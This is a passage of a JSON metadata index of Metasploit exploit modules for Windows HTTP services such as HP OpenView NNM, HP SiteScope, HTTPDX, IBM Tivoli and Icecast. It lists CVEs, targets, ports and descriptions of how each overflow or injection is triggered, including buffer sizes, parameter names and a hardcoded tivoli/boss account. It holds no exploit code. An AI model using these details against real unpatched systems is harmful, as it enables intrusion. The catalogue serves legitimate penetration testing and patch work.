"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. It is interesting to\n note that this vulnerability cannot be exploited by overwriting SEH, since attempting\n to would trigger CVE-2010-1964.\n\n The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n processing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n There are no stack cookies present, so exploitation is easily achieved by overwriting the\n saved return address.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.",
"references": [
"CVE-2010-1961",
"OSVDB-65428",
"BID-40638",
"ZDI-10-106",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01201",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_ovutil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovwebsnmpsrv_uro": {
"name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro",
"rank": 500,
"disclosure_date": "2010-06-08",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.",
"references": [
"CVE-2010-1960",
"OSVDB-65427",
"BID-40637",
"ZDI-10-105"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01206",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_uro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_snmp": {
"name": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_snmp",
"rank": 500,
"disclosure_date": "2009-12-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2009-3849",
"OSVDB-60933"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50 / Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_snmp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_snmp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_snmpviewer_actapp": {
"name": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_snmpviewer_actapp",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".",
"references": [
"CVE-2010-1552",
"OSVDB-64975",
"BID-40068",
"ZDI-10-083",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 w/NNM_01201",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_snmpviewer_actapp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_toolbar_01": {
"name": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_toolbar_01",
"rank": 500,
"disclosure_date": "2009-01-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-0067",
"OSVDB-53222",
"BID-33147"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50 / Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_toolbar_01.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_toolbar_01",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_toolbar_02": {
"name": "HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_toolbar_02",
"rank": 300,
"disclosure_date": "2009-01-21",
"type": "exploit",
"author": [
"Oren Isacson",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an\n attacker may be able to execute arbitrary code. Please note that this module only works\n against a specific build (i.e. NNM 7.53_01195)",
"references": [
"CVE-2009-0920",
"OSVDB-53242",
"BID-34294",
"URL-http://www.coresecurity.com/content/openview-buffer-overflows"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP OpenView Network Node Manager Release B.07.00",
"HP OpenView Network Node Manager 7.53 Patch 01195"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_toolbar_02.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_toolbar_02",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_webappmon_execvp": {
"name": "HP OpenView Network Node Manager execvp_nc Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_webappmon_execvp",
"rank": 500,
"disclosure_date": "2010-07-20",
"type": "exploit",
"author": [
"Shahin Ramezany <shahin@abysssec.com>",
"sinn3r <sinn3r@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.",
"references": [
"CVE-2010-2703",
"OSVDB-66514",
"BID-41829",
"ZDI-10-137",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP OpenView Network Node Manager 7.53 w/NNM_01206",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_webappmon_execvp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_webappmon_ovjavalocale": {
"name": "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_webappmon_ovjavalocale",
"rank": 500,
"disclosure_date": "2010-08-03",
"type": "exploit",
"author": [
"Nahuel Riva",
"sinn3r <sinn3r@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow\n a stack buffer and execute arbitrary code.\n\n The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n declared within this function. When the vulnerability is triggered, the stack trace looks\n like the following:\n\n #0 ...\n #1 sprintf_new(local_stack_buf, fmt, cookie);\n #2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n #4 sub_405ee0(\"nnm\", \"webappmon\");\n\n No validation is done on the cookie argument. There are no stack cookies, so exploitation\n is easily achieved by overwriting the saved return address or SEH frame.\n\n The original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n passed in a request to \"webappmon.exe\". Further research shows that several different\n cookie values, as well as several different CGI applications, can be used.\n '",
"references": [
"CVE-2010-2709",
"OSVDB-66932",
"BID-42154",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520",
"URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP OpenView Network Node Manager 7.53",
"HP OpenView Network Node Manager 7.53 (Windows 2003)",
"Debug Target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_webappmon_ovjavalocale",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_openview_insight_backdoor": {
"name": "HP OpenView Performance Insight Server Backdoor Account Code Execution",
"full_name": "exploit/windows/http/hp_openview_insight_backdoor",
"rank": 600,
"disclosure_date": "2011-01-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0",
"references": [
"CVE-2011-0276",
"OSVDB-70754"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/http/hp_openview_insight_backdoor.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_openview_insight_backdoor",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/hp_pcm_snac_update_certificates": {
"name": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",
"full_name": "exploit/windows/http/hp_pcm_snac_update_certificates",
"rank": 600,
"disclosure_date": "2013-09-09",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.",
"references": [
"CVE-2013-4812",
"OSVDB-97155",
"BID-62348",
"ZDI-13-225"
],
"platform": "Windows",
"arch": "java",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP ProCurve Manager 4.0 SNAC Server"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_pcm_snac_update_certificates",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_pcm_snac_update_domain": {
"name": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",
"full_name": "exploit/windows/http/hp_pcm_snac_update_domain",
"rank": 600,
"disclosure_date": "2013-09-09",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.",
"references": [
"CVE-2013-4811",
"OSVDB-97154",
"BID-62349",
"ZDI-13-226"
],
"platform": "Windows",
"arch": "java",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP ProCurve Manager 4.0 SNAC Server"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_pcm_snac_update_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_power_manager_filename": {
"name": "HP Power Manager 'formExportDataLogs' Buffer Overflow",
"full_name": "exploit/windows/http/hp_power_manager_filename",
"rank": 300,
"disclosure_date": "2011-10-19",
"type": "exploit",
"author": [
"Alin Rad Pop",
"Rodrigo Escobar <ipax@dclabs.com.br>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.\n By creating a malformed request specifically for the fileName parameter, a stack-based\n buffer overflow occurs due to a long error message (which contains the fileName),\n which may result in arbitrary remote code execution under the context of 'SYSTEM'.",
"references": [
"CVE-2009-3999",
"OSVDB-61848",
"BID-37867"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 / Win Server 2003 SP0"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_power_manager_filename.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_power_manager_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_power_manager_login": {
"name": "Hewlett-Packard Power Manager Administration Buffer Overflow",
"full_name": "exploit/windows/http/hp_power_manager_login",
"rank": 200,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n Sending a specially crafted POST request with an overly long Login string, an\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-2685",
"OSVDB-59684"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_power_manager_login.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_power_manager_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_sitescope_dns_tool": {
"name": "HP SiteScope DNS Tool Command Injection",
"full_name": "exploit/windows/http/hp_sitescope_dns_tool",
"rank": 400,
"disclosure_date": "2015-10-09",
"type": "exploit",
"author": [
"Kirk Hayes",
"Charles Riggs",
"Juan Vazquez"
],
"description": "This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. The Linux version is unaffected.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
"URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.30 / Microsoft Windows 7 and higher",
"HP SiteScope 11.30 / CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_sitescope_dns_tool",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_sitescope_runomagentcommand": {
"name": "HP SiteScope Remote Code Execution",
"full_name": "exploit/windows/http/hp_sitescope_runomagentcommand",
"rank": 0,
"disclosure_date": "2013-07-29",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP SiteScope.\n The vulnerability exists in the opcactivate.vbs script, which\n is reachable from the APIBSMIntegrationImpl AXIS service, and\n uses WScript.Shell.run() to execute cmd.exe with user provided\n data. Note that the opcactivate.vbs component is installed\n with the (optional) HP Operations Agent component. The module\n has been tested successfully on HP SiteScope 11.20 (with HP\n Operations Agent) over Windows 2003 SP2.",
"references": [
"CVE-2013-2367",
"OSVDB-95824",
"BID-61506",
"ZDI-13-205"
],
"platform": "Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_sitescope_runomagentcommand",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/httpdx_handlepeer": {
"name": "HTTPDX h_handlepeer() Function Buffer Overflow",
"full_name": "exploit/windows/http/httpdx_handlepeer",
"rank": 500,
"disclosure_date": "2009-10-08",
"type": "exploit",
"author": [
"Pankaj Kohli <pankaj208@gmail.com>",
"Trancer <mtrancer@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The\n vulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.",
"references": [
"OSVDB-58714",
"CVE-2009-3711",
"URL-http://www.pank4j.com/exploits/httpdxb0f.php",
"URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"httpdx 1.4 - Windows XP SP3 English",
"httpdx 1.4 - Windows 2003 SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/httpdx_handlepeer.rb",
"is_install_path": true,
"ref_name": "windows/http/httpdx_handlepeer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/httpdx_tolog_format": {
"name": "HTTPDX tolog() Function Format String Vulnerability",
"full_name": "exploit/windows/http/httpdx_tolog_format",
"rank": 500,
"disclosure_date": "2009-11-17",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in HTTPDX HTTP server.\n By sending a specially crafted HTTP request containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.",
"references": [
"CVE-2009-4769",
"OSVDB-60182"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"httpdx 1.4 - Windows XP SP3 English",
"httpdx 1.4.5 - Windows XP SP3 English",
"httpdx 1.4.6 - Windows XP SP3 English",
"httpdx 1.4.6b - Windows XP SP3 English",
"httpdx 1.5 - Windows XP SP3 English",
"Debug target"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/httpdx_tolog_format.rb",
"is_install_path": true,
"ref_name": "windows/http/httpdx_tolog_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ia_webmail": {
"name": "IA WebMail 3.x Buffer Overflow",
"full_name": "exploit/windows/http/ia_webmail",
"rank": 200,
"disclosure_date": "2003-11-03",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a stack buffer overflow in the IA WebMail server.\n This exploit has not been tested against a live system at\n this time.",
"references": [
"CVE-2003-1192",
"OSVDB-2757",
"BID-8965",
"URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IA WebMail 3.x"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ia_webmail.rb",
"is_install_path": true,
"ref_name": "windows/http/ia_webmail",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ibm_tivoli_endpoint_bof": {
"name": "IBM Tivoli Endpoint Manager POST Query Buffer Overflow",
"full_name": "exploit/windows/http/ibm_tivoli_endpoint_bof",
"rank": 400,
"disclosure_date": "2011-05-31",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Jeremy Brown <0xjbrown@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in the way IBM Tivoli\n Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query\n arguments.\n\n This issue can be triggered by sending a specially crafted HTTP POST request to\n the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n is required. This exploit makes use of a second vulnerability, a hardcoded account\n (tivoli/boss) is used to bypass the authorization restriction.",
"references": [
"CVE-2011-1220",
"OSVDB-72713",
"OSVDB-72751",
"BID-48049",
"ZDI-11-169"
],
"platform": "Windows",
"arch": "",
"rport": 9495,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows Server 2003 SP0",
"Windows Server 2003 SP1",
"Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/ibm_tivoli_endpoint_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ibm_tpmfosd_overflow": {
"name": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",
"full_name": "exploit/windows/http/ibm_tpmfosd_overflow",
"rank": 400,
"disclosure_date": "2007-05-02",
"type": "exploit",
"author": [
"toto"
],
"description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.",
"references": [
"CVE-2007-1868",
"OSVDB-34678",
"BID-23264",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"TPMfOSD 5.1 (Windows 2000 SP4 - English)",
"TPMfOSD 5.1 (Windows 2003 All - English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/ibm_tpmfosd_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ibm_tsm_cad_header": {
"name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",
"full_name": "exploit/windows/http/ibm_tsm_cad_header",
"rank": 400,
"disclosure_date": "2007-09-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.",
"references": [
"CVE-2007-4880",
"OSVDB-38161",
"BID-25743"
],
"platform": "Windows",
"arch": "",
"rport": 1581,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Tivoli Storage Manager Express 5.3.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ibm_tsm_cad_header.rb",
"is_install_path": true,
"ref_name": "windows/http/ibm_tsm_cad_header",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/icecast_header": {
"name": "Icecast Header Overwrite",
"full_name": "exploit/windows/http/icecast_header",
"rank": 500,
"disclosure_date": "2004-09-28",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>",
"Luigi Auriemma <aluigi@autistici.org>"
],
"description": "This module exploits a buffer overflow in the header parsing of icecast\n versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32\n HTTP headers will cause a write one past the end of a pointer array. On\n win32 this happens to overwrite the saved instruction pointer, and on\n linux (depending on compiler, etc) this seems to generally overwrite\n nothing crucial (read not exploitable).\n\n This exploit uses ExitThread(), this will leave icecast thinking the\n thread is still in use, and the thread counter won't be decremented.\n This means for each time your payload exits, the counter will be left\n incremented, and eventually the threadpool limit will be maxed. So you\n can multihit, but only till you fill the threadpool.",
"references": [
"CVE-2004-1561",
"OSVDB-10406",
"BID-11271",
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/icecast_header.rb",
"is_install_path": true,
"ref_name": "windows/http/icecast_header",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/integard_password_bof": {
"name": "Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",
